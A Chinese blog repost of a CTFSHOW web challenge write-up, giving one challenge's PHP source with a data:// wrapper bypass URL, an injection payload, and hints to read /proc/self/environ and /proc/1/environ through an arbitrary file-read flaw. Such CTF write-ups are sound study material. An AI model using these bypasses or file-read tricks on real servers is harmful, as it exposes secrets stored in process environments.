我是靠谱客的博主 懵懂鞋垫,最近开发中收集的这篇文章主要介绍[CTF]CTFSHOW摆烂杯 WEB WP一行代码黑客网站web签到登陆不了登陆不了_revenge,觉得挺不错的,现在分享给大家,希望可以做个参考。
概述
一行代码
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:
2021-11-18 21:25:22
# @Last Modified by:
h1xa
# @Last Modified time: 2021-11-18 22:14:12
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
echo !(!(include "flag.php")||(!error_reporting(0))||stripos($_GET['filename'],'.')||($_GET['id']!=0)||(strlen($_GET['content'])<=7)||(!eregi("ctfsho".substr($_GET['content'],0,1),"ctfshow"))||substr($_GET['content'],0,1)=='w'||(file_get_contents($_GET['filename'],'r') !== "welcome2ctfshow"))?$flag:str_repeat(highlight_file(__FILE__), 0);
很多个条件都要满足,拆分来仔细看就行,并不难
http://e7df25cc-b994-4b15-b08e-a901738bfa9c.challenge.ctf.show/?filename=data://text/plain,welcome2ctfshow&id=0&content=Wasdasdasdasdad
黑客网站
后缀onion,多百度一下就知道了
web签到
1
1
1)+110+(1
登陆不了
验证码处存在任意文件读取,直接读/proc/self/environ就能看到flag
登陆不了_revenge
预期方法群里有发,非预期是赛后羽师傅说的,读/proc/1/environ就能读到…
最后
以上就是懵懂鞋垫为你收集整理的[CTF]CTFSHOW摆烂杯 WEB WP一行代码黑客网站web签到登陆不了登陆不了_revenge的全部内容,希望文章能够帮你解决[CTF]CTFSHOW摆烂杯 WEB WP一行代码黑客网站web签到登陆不了登陆不了_revenge所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复